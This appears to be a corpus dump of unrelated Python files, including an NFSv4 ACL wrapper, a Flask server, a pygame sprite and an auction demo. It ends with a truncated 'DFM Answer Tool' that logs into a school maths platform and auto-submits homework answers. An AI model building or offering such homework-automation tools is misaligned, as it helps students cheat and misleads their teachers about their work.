if timestamp is None:
timestamp = time.time()
return str(int(10000000 * (timestamp - int(timestamp))))
@classmethod
def parse(cls, label: str) -> int:
return int(label)
class QnameHostname(QnameComponent):
id = "$host"
exceptions = [socket.error]
@classmethod
def generate(cls) -> str:
return socket.gethostname()
class QnameUnique(QnameComponent):
"""
This class is NOT thread-safe.
If multithreading is needed, pre-generate the qnames serially
"""
id = "$uniq"
exceptions = []
__num = 0
@classmethod
def generate(cls) -> str:
cls.__num += 1
return str(cls.__num)
class QnameRandomAlpha(QnameComponent):
id = "$randalpha"
exceptions = []
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
class QnameRandomNumeric(QnameComponent):
id = "$randnum"
exceptions = []
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(string.digits) for _ in range(length))
class QnameRandomAlphaNumeric(QnameComponent):
id = "$randalphanum"
exceptions = []
ascii_lower_digits = string.ascii_lowercase + string.digits
@classmethod
def generate(cls, length: int = 8) -> str:
return ''.join(random.choice(cls.ascii_lower_digits) for _ in range(length))
class QnameRandomBase32(QnameComponent):
id = "$randb32"
exceptions = []
@classmethod
def generate(cls, timestamp: float = None) -> str:
if timestamp is None:
timestamp = time.time()
timestamp = int(timestamp * 100000)
b32 = base64.b32encode(struct.pack('>Q', timestamp)).decode().lower()
slc = slice(0, b32.index('='))
b32 = b32[slc]
return ''.join(random.sample(b32, len(b32)))
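# Illustrative round trip (not part of the original module): a Unix timestamp is
# packed into a base32 qname label by QnameTimestamp and recovered with parse().
if __name__ == "__main__":
    label = QnameTimestamp.generate(1600000000.0)
    assert QnameTimestamp.parse(label) == 1600000000
    print(label)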
| 3,632 |
src/nfs4_share/acl.py
|
AlexJanse/network-filesystem-shares
| 0 |
2169545
|
import os
import re
import pwd
import grp
import subprocess
import logging
# Basic paths to binaries
getfacl_bin = "/usr/bin/nfs4_getfacl"
setfacl_bin = "/usr/bin/nfs4_setfacl"
def assert_command_exists(command_path):
assert os.path.isfile(command_path) and os.access(command_path, os.X_OK), "Reading the nfs4 access-control list " \
"requires the executable binary '%s'" % \
command_path
class AccessControlList:
"""
Representation of an NFSv4 ACL (LIST)
"""
def __init__(self, entries):
if type(entries) not in [set, list]:
raise TypeError("Entries should be a set or list")
self.entries = entries
def __repr__(self):
return ",".join([repr(i) for i in self.entries])
def __eq__(self, other):
return self.entries == other.entries
def __iter__(self):
return iter(self.entries)
def __sub__(self, other): # self - other
first_index, last_index = find_sub_list(other.entries, self.entries)
if first_index is None: # No sublist was found
return self
new_acl = AccessControlList(self.entries[:first_index]+self.entries[last_index+1:])
return new_acl
def __add__(self, other):
new_acl = AccessControlList(self.entries + other.entries)
return new_acl
@classmethod
def from_file(cls, filename):
"""Calls the nfs4_getfacl binaries via CLI to get ACEs"""
global getfacl_bin
assert_command_exists(getfacl_bin)
try:
output = subprocess.check_output([getfacl_bin, filename], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
logging.error(e.cmd)
logging.error(e.stdout.decode())
logging.error(e.stderr.decode())
raise e
entries = []
for line in nonblank_lines(output.decode().split("\n")):
if line.startswith('#'):
continue
entry = AccessControlEntity.from_string(line, filename=filename)
entries.append(entry)
if len(entries) == 0:
raise OSError("Could not get ACLs from file \'%s\'" % filename)
return cls(entries)
def append(self, *args, **kwargs):
self._change_nfs4('-a', *args, **kwargs)
def set(self, *args, **kwargs):
self._change_nfs4('-s', *args, **kwargs)
def unset(self, *args, **kwargs):
self._change_nfs4('-x', *args, **kwargs)
def _change_nfs4(self, action, target, recursive=False, test=False):
"""
Calls the nfs4_setfacl binaries via CLI to change permissions
"""
logging.debug("Changing permissions (%s) on %s (recursive=%s)" % (action, target, recursive))
global setfacl_bin
assert_command_exists(setfacl_bin)
command = [setfacl_bin]
if recursive:
command.append('-R')
if test:
command.append('--test')
command.append(action)
command.extend([repr(self), target])
try:
subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
logging.error("Subprocess: %s" % e.cmd)
logging.error("Subprocess: %s" % e.output.decode())
raise e
class AccessControlEntity:
"""
Representation of an NFSv4 ACE (Entity)
"""
ace_spec = "{entry_type}:{flags}:{identity}@{domain}:{permissions}"
def __init__(self, entry_type, flags, identity, domain, permissions):
self.entry_type = entry_type
self.flags = flags
self.identity = identity
self.domain = domain
self.permissions = permissions
def __repr__(self):
return self.ace_spec.format(
entry_type=self.entry_type,
flags=self.flags,
identity=self.identity,
domain=self.domain,
permissions=self.permissions)
def __str__(self):
return repr(self)
def __eq__(self, other):
if self.entry_type != other.entry_type \
or self.flags != other.flags \
or self.domain != other.domain \
or self.identity != other.identity:
return False
if len(self.permissions) != len(other.permissions):
return False
for perm in self.permissions:
if perm not in other.permissions:
return False
return True
@property
def permissions(self):
return self._permissions
@permissions.setter
def permissions(self, value):
for letter in value:
if letter in ['R', 'W', 'X']:
raise NotImplementedError("Upper-case permissions are not allowed (%s) [R->rtncy, W->waDtTNcCy, "
"X->xtcy]" % value)
self._permissions = value
@classmethod
def from_string(cls, string, filename=None):
"""
Returns a AccessControlEntity tat is based on a string.
A filename is required if one wants to translate special principal
"""
components = string.split(':')
entry_type = components[0]
flags = components[1]
principal = components[2]
if principal in ['OWNER@', 'GROUP@', 'EVERYONE@']:
assert filename is not None, "filename is required to make a special principal translation!"
identity, domain, flags = cls.translate_special_principals(principal, filename, flags)
else:
split = principal.split('@')
identity = split[0]
domain = split[1]
permissions = components[3]
return cls(entry_type, flags, identity, domain, permissions)
@staticmethod
def translate_special_principals(principal, filename, flags):
"""
Translates a special principal to the actual user / group name. NFS4 share domain is taken from /etc/idmapd.conf and falls back on `dnsdomainname`.
Returns identity, domain and flags"""
domain = get_nfs4_domain()
stat_info = os.stat(filename)
if 'OWNER@' == principal:
uid = stat_info.st_uid
user = pwd.getpwuid(uid)[0]
return user, domain, flags
elif 'GROUP@' == principal:
gid = stat_info.st_gid
group = grp.getgrgid(gid)[0]
flags = flags+'g'
return group, domain, flags
elif 'EVERYONE@' == principal:
return "EVERYONE", '', flags
else:
raise NotImplementedError("Cannot translate %s" % principal)
def get_nfs4_domain():
domain = subprocess.run(['egrep', '-s', '^Domain', '/etc/idmapd.conf'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip()
try:
domain = re.search('[a-z\\.\\-]+$', domain).group(0)
except AttributeError:
pass
if len(domain) == 0:
domain = subprocess.run(['dnsdomainname'], stdout=subprocess.PIPE).stdout.decode('utf-8').rstrip()
return (domain)
def nonblank_lines(f):
for line in f:
line = line.rstrip()
if line:
yield line
def find_sub_list(sublist, mainlist):
sublist_length = len(sublist)
for index in (i for i, e in enumerate(mainlist) if e == sublist[0]):
if mainlist[index:index + sublist_length] == sublist:
return index, index+sublist_length-1
return None, None
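if __name__ == "__main__":
    # Illustrative sketch (not part of the original module): parsing a single ACE
    # string with an explicit principal, which needs no stat() lookup on a file.
    ace = AccessControlEntity.from_string("A::alice@example.com:rxtncy")
    print(ace.identity, ace.domain, ace.permissions)   # -> alice example.com rxtncy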
| 7,560 |
core/action.py
|
pistonsky/trello-standup-bot
| 0 |
2170296
|
import datetime
import pytz
class Action:
def __init__(self, action, timezone):
self.action = action
self.timezone = timezone
def __str__(self):
if self.action['type'] == 'addMemberToCard':
return('{id} added to {name} at {time}'.format(
id=self.action['data']['card']['id'],
name=self.action['data']['card']['name'],
time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p')))
if self.action['type'] == 'removeMemberFromCard':
return('{id} removed from {name} at {time}'.format(
id=self.action['data']['card']['id'],
name=self.action['data']['card']['name'],
time=pytz.timezone('utc').localize(datetime.datetime.strptime(self.action['date'][:19], '%Y-%m-%dT%H:%M:%S')).astimezone(pytz.timezone(self.timezone)).strftime('%A %-I:%M %p')))
def __sub__(self, other):
action_a = self.action
action_b = other
duration = datetime.datetime.strptime(action_a['date'][:19], '%Y-%m-%dT%H:%M:%S') - datetime.datetime.strptime(action_b['date'][:19], '%Y-%m-%dT%H:%M:%S')
raw_seconds = duration.seconds + duration.days*24*3600
if raw_seconds < 0:
raw_seconds *= -1
return raw_seconds
def match(self, another_action):
return another_action['type'] != self.action['type'] and another_action['data']['card']['id'] == self.action['data']['card']['id']
| 1,594 |
push/management/commands/startbatches.py
|
nnsnodnb/djabaas
| 3 |
2170703
|
# coding=utf-8
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from push.models import DeviceTokenModel, NotificationModel
from datetime import datetime
import os, os.path, sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '../../modules/')
import push_notification
class Command(BaseCommand):
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
def handle(self, *args, **kwargs):
now = '{0:%Y/%m/%d %H:%M}'.format(datetime.now())
notifications = NotificationModel.objects.filter(execute_datetime = now,
is_sent = False,
status = 0)
for notification in notifications:
device_tokens = DeviceTokenModel.objects.filter(os_version__gte = notification.os_version,
username = notification.username)
self.prepare_push_notification(notification, device_tokens)
def prepare_push_notification(self, notification, device_tokens):
device_token_lists = []
for item in device_tokens:
device_token_lists.append(item.device_token)
push_notification.execute(device_token_lists, notification)
| 1,358 |
challenges/k_difference_advanced.py
|
gioiab/py-collection
| 0 |
2170499
|
"""
Created on 06/apr/2015
@author: gioia
The script provides my solution to an advanced version of the "K difference" challenge. The challenge is about counting
the total pairs of numbers whose difference is K in a list of N non-unique positive integers.
Input:
* the first line contains N (the number of positive integers) and K (the difference)
* the second line contains the N integers
Output:
* the number of pairs whose difference is K
Enjoy!
"""
def get_pairs(l, k):
"""
Given a list L of N positive integers, returns the count of the total pairs of numbers whose difference is K.
First, each integer is stored into a dictionary along with its frequency. Then, for each integer I in the input
list, the presence of the integer I+K is checked within the dictionary. The computational time complexity of the
algorithm is still O(N).
:param k: the given difference
:type k: int
:param l: the list of input integers
:type l: list
:return: the count of the total pairs of numbers whose difference is k
:rtype: int
"""
hash_map = {}
for i in l:
hash_map[i] = hash_map.get(i, 0) + 1
return sum([hash_map[i + k] for i in l if hash_map.get(i + k)])
def main():
"""
The main function of the program. It collects the inputs and calls the get_pairs function.
"""
_, k = map(int, raw_input().split())
l = map(int, raw_input().split())
print get_pairs(l, k)
if __name__ == '__main__':
"""The entry point of the program. It simply calls the main function.
"""
main()
| 1,575 |
asteroid.py
|
borgaster/SpaceWarsEvolved
| 0 |
2169591
|
import math
import random
from loader import *
import pygame
from pygame.locals import *
class Asteroid(pygame.sprite.Sprite):
def __init__(self,num):
pygame.sprite.Sprite.__init__(self)
        # To guarantee as much randomness as possible
listagem=[1,2,3,4,5,6,7,8,9,10]
random.shuffle(listagem)
random.shuffle(listagem)
i=random.uniform(0,9)
if listagem[int(i)] >= 3 and listagem[int(i)] <= 5:
if listagem[int(i)] == 3:
picture="asteroid_pekeno1.png"
elif listagem[int(i)] == 4:
picture="asteroid_pekeno2.png"
else:
picture="asteroid_pekeno3.png"
self.hitpoints = 10
elif listagem[int(i)] < 3:
if listagem[int(i)] >=1 and listagem[int(i)]<=2:
picture="crazyAlien.gif"
self.hitpoints = 20
else:
picture="spaceGosma.png"
self.hitpoints=15
else:
listagem=[2,1]
random.shuffle(listagem)
if listagem[0]==1:
picture="crazyDoc.png"
self.hitpoints = 5
else:
picture="crazyship1.gif"
self.hitpoints = 11
self.image, self.rect = load_image(picture, -1)
self.Sprite = pygame.sprite.RenderPlain(())
self.num = num
self.screensize = [1120,840]
modifier = random.randrange(0,2)
if modifier == 0:
modifier = -1
else:
modifier = 1
multiplicador1 = (random.randrange(0,4)+1)*modifier
modifier = random.randrange(0,2)
if modifier == 0:
modifier = -1
else:
modifier = 1
multiplicador2 = (random.randrange(0,4)+1)*modifier
self.vel = [multiplicador1, multiplicador2]
#self.pos = [random.randrange(0,960)+40,random.randrange(0,660)+40]
self.pos = [self.screensize[0]/2,-100]
self.rect.center = self.pos
def update(self):
self.rect.move_ip(self.vel[0], self.vel[1])
# print "my coords: "+str(self.rect.center)
self.pos[0] +=self.vel[0]
self.pos[1] +=self.vel[1]
if not -110 < self.pos[0] < self.screensize[0]:
self.vel[0] = -self.vel[0]
if not -110 < self.pos[1] < self.screensize[1]:
self.vel[1] = -self.vel[1]
def kill_asteroid(self):
if self.hitpoints <=0:
self.kill()
return 1
return 0
| 2,627 |
stock/trade_reduction_demo_difference_gft0.py
|
dvirg/auctions
| 1 |
2170664
|
#!python3
"""
Demonstration of a trade-reduction strongly-budget-balanced auction
for a multi-lateral market with buyers, sellers and two kinds of mediators (the recipe used below is 1,2,3,4)
Since: 2020-10
Author: <NAME>
"""
from markets import Market
from agents import AgentCategory
import trade_reduction_protocol
from trade_reduction_protocol import budget_balanced_trade_reduction
import random
import logging
trade_reduction_protocol.logger.setLevel(logging.INFO)
def removeSeconds(prices, reduce_number):
new_array = []
for i in range(len(prices)):
if i % reduce_number != 0:
new_array.append(prices[i])
return new_array
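# Note (added): despite its name, removeSeconds() drops every element whose index is a
# multiple of reduce_number (i % reduce_number == 0) and keeps all the others.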
print("\n\n###### RUNNING EXAMPLE FROM THE PAPER FOR TYPE (1,2,3,4): buyers-sellers-mediators-mediatorsB")
recipe = [1, 2, 3, 4]
with_count = 1
without_count = 1
with_gft = 1
without_gft = 1
reduce_number = 1
while without_count == with_count:
reduce_number += 1
buyers = [135.9, 136.7999, 143.5499, 144.0]
sellers = [-18.95, -18.9, -17.95, -17.9, -17.7999, -17.7999, -17.2999, -17.0, -16.95, -16.7999, -15.15, -15.0, -15.0, -14.9, -14.2, -14.2, -14.1, -13.95]
mediators = [-19.7, -19.6, -19.2999, -19.2999, -19.2999, -19.2, -18.9, -18.5, -18.5, -18.5, -18.0, -17.95, -17.9, -17.7999, -17.4, -17.4, -17.35, -17.35, -15.7, -15.7, -15.6, -15.1, -14.95, -14.85, -14.75, -14.65, -14.55, -14.55, -14.5, -13.95, -13.2, -13.2, -13.2, -12.75]
mediatorsB = [-20.1, -20.0499, -19.6, -19.6, -19.5499, -19.5499, -19.45, -19.45, -19.4, -19.4, -19.1, -19.0, -19.0, -18.95, -18.7, -18.7, -18.45, -18.45, -17.9, -17.9, -17.85, -17.7, -17.45, -17.45, -17.2999, -17.2, -17.1, -17.1, -17.0499, -15.7, -15.25, -15.25, -15.25, -15.15, -14.95, -14.95, -14.95, -14.6, -14.55, -14.45, -14.45, -14.4, -14.15, -14.05, -13.75, -13.7, -13.15, -12.9, -12.9, -12.65]
#
# buyers = removeSeconds(buyers, reduce_number)
# sellers = removeSeconds(sellers, reduce_number)
# mediators = removeSeconds(mediators, reduce_number)
# mediatorsB = removeSeconds(mediatorsB, reduce_number)
#
# random.shuffle(buyers)
# random.shuffle(sellers)
# random.shuffle(mediators)
# random.shuffle(mediatorsB)
market = Market([
AgentCategory("buyer", buyers),
AgentCategory("seller", sellers),
AgentCategory("mediator", mediators),
AgentCategory("mediatorB", mediatorsB),
])
without_gft0 = budget_balanced_trade_reduction(market, recipe, False)
with_gft0 = budget_balanced_trade_reduction(market, recipe, True)
print(without_gft0)
print(with_gft0)
without_count = without_gft0.num_of_deals()
with_count = with_gft0.num_of_deals()
without_gft = without_gft0.gain_from_trade()
with_gft = with_gft0.gain_from_trade()
print('Compare: Without:', without_gft, "With:", with_gft)
print('Compare: Without:', without_count, "With:", with_count)
break
# print(" buyers =", buyers)
# print(" sellers =", sellers)
# print(" mediators =", mediators)
# print(" mediatorsB =", mediatorsB)
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: buyers-mediators-sellers")
# market = Market([
# AgentCategory("buyer", buyers),
# AgentCategory("mediator", mediators),
# AgentCategory("seller", sellers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-buyers-mediators")
# market = Market([
# AgentCategory("seller", sellers),
# AgentCategory("buyer", buyers),
# AgentCategory("mediator", mediators),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: sellers-mediators-buyers")
# market = Market([
# AgentCategory("seller", sellers),
# AgentCategory("mediator", mediators),
# AgentCategory("buyer", buyers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-sellers-buyers")
# market = Market([
# AgentCategory("mediator", mediators),
# AgentCategory("seller", sellers),
# AgentCategory("buyer", buyers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
# print("\n\n###### SAME EXAMPLE WITH DIFFERENT ORDER: mediators-buyers-sellers")
# market = Market([
# AgentCategory("mediator", mediators),
# AgentCategory("buyer", buyers),
# AgentCategory("seller", sellers),
# ])
# print(budget_balanced_trade_reduction(market, recipe))
#
#
#
#
| 4,489 |
sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/grid_capacity/server/app.py
|
threefoldtech/threebot_prebuilt
| 2 |
2170611
|
import os
import sys
import datetime
from flask import Flask, jsonify
from Jumpscale import j
from . import settings
from .flask_itsyouonline import configure
from .models import db
app = Flask(__name__)
app.secret_key = os.urandom(24)
configure(
app,
settings.IYO_CLIENTID,
settings.IYO_SECRET,
settings.IYO_CALLBACK,
"/callback",
None,
True,
True,
"organization",
)
# connect to mongodb
j.clients.mongoengine.get("capacity", interactive=False)
db.init_app(app)
from .api_api import api_api
from .frontend_blueprint import frontend_bp
app.register_blueprint(api_api)
app.register_blueprint(frontend_bp)
@app.template_filter()
def uptime(seconds):
if not seconds:
return "not available"
delta = datetime.timedelta(seconds=seconds)
# manually compute hh:mm:ss
hrs = int(delta.seconds / 3600)
min = int((delta.seconds - (hrs * 3600)) / 60)
sec = delta.seconds % 60
if delta.days > 0:
return "%d days, %02d:%02d:%02d" % (delta.days, hrs, min, sec)
return "%02d:%02d:%02d" % (hrs, min, sec)
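# Example (added for illustration): uptime(90061) -> "1 days, 01:01:01",
# uptime(3661) -> "01:01:01", and uptime(None) -> "not available".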
@app.template_filter()
def deltatime_color(time):
"""
    return a color name based on how long ago `time` was seen
    :param time: the time to compare against
:type time: datetime.datetime
:return: color
:rtype: str
"""
if not time:
return "danger"
delta = (datetime.datetime.now() - time).total_seconds()
if delta <= 600: # 10 minutes or less
return "success"
if 600 < delta and delta < 900: # between 10 and 15 minutes
return "warning"
    if delta > 900:  # more than 15 minutes
return "danger"
@app.template_filter()
def node_status(time):
"""
    return a node status ("up", "likely down" or "down") based on how long ago `time` was seen
    :param time: the time to compare against
    :type time: datetime.datetime
    :return: status
:rtype: str
"""
if not time:
return "down"
delta = (datetime.datetime.now() - time).total_seconds()
if delta <= 600: # 10 minutes or less
return "up"
if 600 < delta and delta < 900: # between 10 and 15 minutes
return "likely down"
    if delta > 900:  # more than 15 minutes
return "down"
@app.errorhandler(500)
def internal_error(err):
_, _, exc_traceback = sys.exc_info()
eco = j.core.errorhandler.parsePythonExceptionObject(err, tb=exc_traceback)
return jsonify(code=500, message=eco.errormessage, stack_trace=eco.traceback), 500
if __name__ == "__main__":
    app.run(debug=True, port=settings.PORT)  # 'host' was previously passed settings.PORT by mistake; the Flask default host is used instead
| 2,564 |
assignment3.py
|
racarla96/mpc-course-assignments
| 0 |
2170447
|
import numpy as np
from sim.sim2d import sim_run
# Simulator options.
options = {}
options['FIG_SIZE'] = [8,8]
options['OBSTACLES'] = True
class ModelPredictiveControl:
def __init__(self):
self.horizon = 15
self.dt = 0.2
# Reference or set point the controller will achieve.
self.reference1 = [10, 0, 0]
self.reference2 = None
self.x_obs = 5
self.y_obs = 0.1
def plant_model(self,prev_state, dt, pedal, steering):
x_t = prev_state[0]
y_t = prev_state[1]
psi_t = prev_state[2]
v_t = prev_state[3]
a_t = pedal
x_t = x_t + np.cos(psi_t) * v_t * dt
y_t = y_t + np.sin(psi_t) * v_t * dt
v_t = v_t + a_t * dt - v_t/25
psi_t = psi_t + v_t * (np.tan(steering)/2.5) * dt
return [x_t, y_t, psi_t, v_t]
def cost_function(self,u, *args):
state = args[0]
ref = args[1]
cost = 0.0
car_width = 1.0
car_height = 2.5
car_radius = 2.5
object_radius = 0.5
for i in range(0, self.horizon):
state = self.plant_model(state, self.dt, u[i*2], u[i*2+1])
# Distance cost
distance_cost = np.sqrt( ((ref[0] - state[0]) ** 2) + ((ref[1] - state[1]) ** 2) )
# Angle cost
angle_cost = 0
if distance_cost < 4:
angle_cost = (ref[2] - state[2]) ** 2
# Object cost
obj_distance = (np.sqrt(((self.x_obs - state[0]) ** 2) + ((self.y_obs - state[1]) ** 2)))
obj_cost = 0
if obj_distance < 1.5:
obj_cost = 1000/obj_distance
cost += distance_cost + obj_cost + angle_cost
return cost
sim_run(options, ModelPredictiveControl)
| 1,784 |
treillage/__init__.py
|
hanztura/Treillage
| 1 |
2169718
|
from ._version import get_versions
from .treillage import Treillage
from .treillage import BaseURL
from .exceptions import *
from .credential import Credential
from .ratelimiter import RateLimiter
from .token_manager import TokenManager
from .connection_manager import ConnectionManager
from .connection_manager import retry_on_rate_limit
__version__ = get_versions()['version']
del get_versions
| 397 |
tests/test_lr_schedulers.py
|
igormq/speech2text
| 11 |
2170802
|
import pytest
from asr import lr_schedulers
import torch
import logging
@pytest.mark.parametrize(
'name, klass',
[("step", torch.optim.lr_scheduler.StepLR),
("multi_step", torch.optim.lr_scheduler.MultiStepLR),
("exponential", torch.optim.lr_scheduler.ExponentialLR),
("reduce_on_plateau", torch.optim.lr_scheduler.ReduceLROnPlateau),
("cosine", torch.optim.lr_scheduler.CosineAnnealingLR),
("cyclic", torch.optim.lr_scheduler.CyclicLR)])
def test_by_name(name, klass):
k = lr_schedulers.by_name(name)
assert k == klass
def test_by_name_invalid():  # renamed: a second test_by_name would shadow the parametrized test above
with pytest.raises(ValueError):
lr_schedulers.by_name('invalid-name')
def test_from_params():
params = [torch.rand(1).requires_grad_()]
optimizer = torch.optim.SGD(params, 0.1)
params = 'step'
with pytest.raises(TypeError) as excinfo:
lr_scheduler = lr_schedulers.from_params(params)
isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert "missing 1 required positional argument: 'optimizer'" in str(
excinfo.value)
with pytest.raises(TypeError) as excinfo:
lr_scheduler = lr_schedulers.from_params(params, optimizer)
assert "missing 1 required positional argument: 'step_size'" in str(
excinfo.value)
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1)
    assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
params = {'type': 'step'}
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=1)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
params = {'type': 'step', 'step_size': 1}
lr_scheduler = lr_schedulers.from_params(params, optimizer)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert lr_scheduler.step_size == 1
params = {'type': 'step', 'step_size': 1}
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2)
assert isinstance(lr_scheduler, torch.optim.lr_scheduler.StepLR)
assert lr_scheduler.step_size == 2
def test_logging(caplog):
params = {'type': 'step', 'step_size': 1}
optimizer = torch.optim.SGD([torch.rand(1).requires_grad_()], 0.1)
lr_scheduler = lr_schedulers.from_params(params, optimizer, step_size=2)
assert "Instantiating class `torch.optim.lr_scheduler.StepLR` with params {'step_size': 2}" in caplog.record_tuples[
0][2]
assert logging.INFO == caplog.record_tuples[0][1]
| 2,464 |
Sources/HTTPGetImage.py
|
hatjs880328s/AutoBuildIOSProject
| 2 |
2170424
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import urllib2
import time
import json
import os
from IILog import *
'''
First, get all picture URLs.
Second, download all of them.
Third, save them into the target folder.
# references:
<download pics> https://blog.csdn.net/j_c_weaton/article/details/53895149
<read api> https://blog.csdn.net/sunshinelyc/article/details/52755044
'''
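# Note (added): getAPIUrl() and getLocalPicPath() below read 'sourcePathsourceipaName.txt'
# and keep everything after the first 13 characters of the matching line, so that file is
# presumably made of lines like "ApiRefurls = <url>" and "LogoRepath = <path>"
# (the exact format is an assumption, inferred only from the slicing in the code).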
IILog().successPrint('####### Start - HTTPGetImageModule---')
# get the network picture URLs
def loadALLPicsURL(url):
picDic = {}
# YSJ PIC
picDefaulturl = 'http://i2.bvimg.com/642337/51d104edb0802d52.png'
# CLOUD PIC
picLandurl = 'http://i2.bvimg.com/642337/cd1c6c175210b5aa.png'
response = urllib2.urlopen(url)
jsondata = json.loads(response.read())
for eachItem in jsondata['result']:
picDic[eachItem['id']] = picDefaulturl
return picDic
# the API URL used to fetch the picture list
def getAPIUrl():
apiUrl = ''
fileHandle = open('sourcePathsourceipaName.txt', 'r')
for eachItem in fileHandle.readlines():
if eachItem.__contains__('ApiRefurls'):
apiUrl = eachItem[13:].strip('\n')
break
else:
continue
print('### The pics url is: ' + apiUrl)
fileHandle.close()
return apiUrl
# local pic path
def getLocalPicPath():
logoPath = ''
fileHandle = open('sourcePathsourceipaName.txt', 'r')
for eachItem in fileHandle.readlines():
if eachItem.__contains__('LogoRepath'):
logoPath = eachItem[13:].strip('\n')
break
else:
continue
fileHandle.close()
print('### The Local logo path is: ' + logoPath)
return logoPath + '/'
'''
GET URL THAT IT CAN GET PICS - apiUrl
GET ALL PICS URL LIST<STRING> - picUrls
'''
# pic api address
apiUrl = getAPIUrl()
# pic url dic <string,string>
picUrls = loadALLPicsURL(apiUrl)
# local logo path
localLogopath = getLocalPicPath()
IILog().successPrint('### Get all pic url & names ok...\n')
'''
GET PIC DATA WITH PICURL
GO-
'''
# fetch the remote picture and write it to the given file
def getImageData(picName,picUrl):
binary_data = urllib2.urlopen(picUrl).read()
temp_file = open(picName, 'wb')
temp_file.write(binary_data)
temp_file.close()
# loop over all local logo files and use getImageData() to replace their data
def runloopChangePic():
# for picValue in picDir.keys():
path = localLogopath
for file in os.listdir(path):
if file.__contains__('.png'):
print('### Change pic ' + file + ' data start...')
getImageData(path + file, picUrls.values()[0])
IILog().successPrint('### Change pic ' + file + ' data end...\n')
'''
START-CHANGE LOGO DATA
'''
runloopChangePic()
IILog().successPrint('### Pics Change ok.')
| 2,805 |
prog_python/tuplas/swap.py
|
TCGamer123/python
| 1 |
2167776
|
x = 10
y = 20
# Traditional swap
print("x and y before the swap: ", x, y)
temp = x
x = y
y = temp
print("x and y after the swap: ", x, y)
print()
x = 10
y = 20
# Swap using tuples
print("x and y before the swap: ", x, y)
x, y = y, x
print("x and y after the swap: ", x, y)
| 275 |
Ago-Dic-2019/IvanMedina/pythonCrash/summingAMillon.py
|
Arbupa/DAS_Sistemas
| 41 |
2169947
|
'''
<NAME>
4.5
'''
from countingToTwenty import makeList
from countingToTwenty import printList
if __name__ == "__main__":
    numbers = makeList(1000000)  # avoid shadowing the built-in `list`
    print("[ MIN ] : {}".format(min(numbers)))
    print("[ MAX ] : {}".format(max(numbers)))
    print("[ SUM ] : {}".format(sum(numbers)))
| 285 |
main.py
|
AsadKhan163631/DFM-Answer-Tool
| 2 |
2168815
|
import json
import sys  # needed for sys.stderr and sys.exit used below
import tkinter.messagebox as tm
import traceback
from tkinter import *
from requests import Session
from answer_handler import AnswerHandler
class InvalidLoginDetails(Exception):
pass
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
self.label_username = Label(self, text="Email")
self.label_password = Label(self, text="Password")
self.entry_username = Entry(self)
self.entry_password = Entry(self, show="*")
self.label_username.grid(row=0, sticky=E)
self.label_password.grid(row=1, sticky=E)
self.entry_username.grid(row=0, column=1)
self.entry_password.grid(row=1, column=1)
self.log_btn = Button(self, text="Login", command=self._login_btn_clicked)
self.log_btn.grid(columnspan=2)
self.pack()
def _login_btn_clicked(self):
email = self.entry_username.get()
password = self.entry_password.get()
if '@' not in email:
email += '@kedst.ac.uk'
try:
Interface(email, password)
except InvalidLoginDetails as e:
print(e, file=sys.stderr)
tm.showerror("Login error", "Incorrect Email or Password")
class Interface:
"""
main interface between user and script
"""
def __init__(self, email, password):
self.session = Session()
self.test_login(email, password)
self.handler = AnswerHandler(self.session)
root.destroy() # destroy login menu
self.print_init()
self.print_instructions()
self.main_loop()
def main_loop(self):
"""
main interface loop
        will only exit if ctrl-c is pressed
"""
print('Press ctrl-c to quit')
while True:
url = input('\nType Question url: ')
handler = AnswerHandler(self.session)
res, err = handler.answer_questions(url)
if res:
print('No more questions for this URL')
else:
print(f'Unexpected exception occurred: {err}', file=sys.stderr)
traceback.print_exc()
def test_login(self, email, password):
login_url = 'https://www.drfrostmaths.com/process-login.php?url='
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/71.0.3578.98 Safari/537.36'}
data = {'login-email': email, 'login-password': password}
self.session.post(login_url, headers=headers, data=data)
try:
"""
            verify the user is authenticated by testing whether the times-tables endpoint can be loaded
"""
res = self.session.get('https://www.drfrostmaths.com/homework/process-starttimestables.php')
json.loads(res.text)
except BaseException:
raise InvalidLoginDetails(f'Email: {email}, Password: {"*" * len(password)}')
@staticmethod
def print_init():
print_string = '---- Dr Frost Answer Tool v3 ----\n' \
'---- Author: AK163631 ----\n' \
'*** Warning: this script has not been properly tested so might unexpectedly break ***\n' \
'Source: https://github.com/AK163631/DFM-Answer-Tool\n' \
'The author does not assume any liability for the use or abuse of this program!\n' \
'This tool is intended to be used to check answers\n' \
                       'Although it submits most answer types for you\n' \
'Release notes:\n' \
' - Fixed and optimised parser'
print(print_string)
@staticmethod
def print_instructions():
        print_string = "\nstep1 - Login to dfm on both the tool and the web browser\n" \
                       "step2 - Navigate to a set of assessment questions on dfm, usually set by a teacher\n" \
